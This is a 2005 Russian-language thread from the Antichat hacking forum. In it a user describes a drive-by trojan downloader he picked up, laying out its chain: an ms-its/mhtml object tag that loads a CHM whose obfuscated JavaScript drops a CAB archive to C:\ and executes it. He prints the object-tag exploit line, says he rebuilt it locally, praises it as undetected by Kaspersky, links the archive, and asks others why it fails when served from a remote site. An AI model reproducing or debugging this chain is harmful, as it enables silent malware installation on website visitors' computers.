Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |

11.12.2005, 00:18
|
|
Познавший АНТИЧАТ
Регистрация: 16.11.2004
Сообщений: 1,257
Провел на форуме: 1331503
Репутация:
454
|
|
Запуск exe прямо с сайта
Когда-то подцепил вирус Mediket. Что он делает так и не понял, но появляется в виде каба в корне диска C. EXEшник из каба запускается.
Потом еще пару раз цеплял другие его моды. Надоело мне все это, захотел разобраться как он ко мне попадает. Вот что нашел. На каком-то сайте лежит
(как его обозвал Касперский) Trojan-downloader.JS.small.bp. Это просто яваскрипт, который в конечном итоге пишет строчку типа
Код:
<object data= "ms-its:mhtml:file://C:cust20cust.mht!http://localhost/bomba.chm::/bomba.htm" type="text/x-scriptlet"></object>
bomba.chm определяется как Trojan-downloader.JS.Psyme.bi
в нем единственный файл bomba.htm, в котором находжится очень извращенный яваскрипт, одна часть которого грузит cab-архив в c:\, потом запускает через object, а другая получает имена всех подпапок из Temporary Internet files и пробует запустить другой архив из каждой.
В архиве лежит exe-шник и инф-файл, запускающий его.
Кстати, все названия файлов выглядели типа eied_s7.chm итп, я их заменил. Сайт заменил на локалхост.
====
Так вот. Поставил себе самописный сервак на делфи, открываю страницу http://localhost/launch.htm в IE. Все в порядке, через пару секунд запускается программа на делфи (окно и кнопка, по которой зацикливание).
Значит, код работает. Аналогично когда localhost заменен на ip соседнего компа сети.
Когда я поменял везде localhost на мой тест-сайт develop.hut1.ru, пытаюсь запустить все это из интернета, нифига не запускается. Кажется, дело не доходит до chm-файла.
Может, кто-то увидит, из-за чего?
Код все таки интересный. Заходишь на сайт и тебе сразу троян. И каспер уже не палит.
Архив с этой байдой КАЧАТЬ ТУТ
PS: Использовался cabarc.exe, блокнот, IE, htm2chm, Delphi и может что забыл.
Последний раз редактировалось vvs777; 11.12.2005 в 00:24..
Причина: Забыл файл.
|
|
|

23.12.2005, 01:16
|
|
Познавший АНТИЧАТ
Регистрация: 16.11.2004
Сообщений: 1,257
Провел на форуме: 1331503
Репутация:
454
|
|
Глухо. Может, не в тот раздел кинул?
|
|
|

23.12.2005, 08:18
|
|
Познающий
Регистрация: 04.12.2005
Сообщений: 31
Провел на форуме: 226204
Репутация:
5
|
|
кажется из-за!
Сообщение от vvs777
Когда-то подцепил вирус Mediket. Что он делает так и не понял, но появляется в виде каба в корне диска C. EXEшник из каба запускается.
Потом еще пару раз цеплял другие его моды. Надоело мне все это, захотел разобраться как он ко мне попадает. Вот что нашел. На каком-то сайте лежит
(как его обозвал Касперский) Trojan-downloader.JS.small.bp. Это просто яваскрипт, который в конечном итоге пишет строчку типа
Код:
<object data= "ms-its:mhtml:file://C:cust20cust.mht!http://localhost/bomba.chm::/bomba.htm" type="text/x-scriptlet"></object>
bomba.chm определяется как Trojan-downloader.JS.Psyme.bi
в нем единственный файл bomba.htm, в котором находжится очень извращенный яваскрипт, одна часть которого грузит cab-архив в c:\, потом запускает через object, а другая получает имена всех подпапок из Temporary Internet files и пробует запустить другой архив из каждой.
В архиве лежит exe-шник и инф-файл, запускающий его.
Кстати, все названия файлов выглядели типа eied_s7.chm итп, я их заменил. Сайт заменил на локалхост.
====
Так вот. Поставил себе самописный сервак на делфи, открываю страницу http://localhost/launch.htm в IE. Все в порядке, через пару секунд запускается программа на делфи (окно и кнопка, по которой зацикливание).
Значит, код работает. Аналогично когда localhost заменен на ip соседнего компа сети.
Когда я поменял везде localhost на мой тест-сайт develop.hut1.ru, пытаюсь запустить все это из интернета, нифига не запускается. Кажется, дело не доходит до chm-файла.
Может, кто-то увидит, из-за чего?
Код все таки интересный. Заходишь на сайт и тебе сразу троян. И каспер уже не палит.
Архив с этой байдой КАЧАТЬ ТУТ
PS: Использовался cabarc.exe, блокнот, IE, htm2chm, Delphi и может что забыл.
кажется из-за "file://" если его убрать на localhost'e то exe и тут не запустится!!!
|
|
|

23.12.2005, 17:16
|
|
Pagan Heart
Регистрация: 12.08.2004
Сообщений: 3,791
Провел на форуме: 6490435
Репутация:
2290
|
|
теоретически никак
|
|
|

25.12.2005, 00:54
|
|
Познавший АНТИЧАТ
Регистрация: 16.11.2004
Сообщений: 1,257
Провел на форуме: 1331503
Репутация:
454
|
|
Не, я гарантирую что это должно работать. С того американского сервака этот вирусяка мне же приплыл когда-то? И file там вроде не должен быть...
|
|
|
|
 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|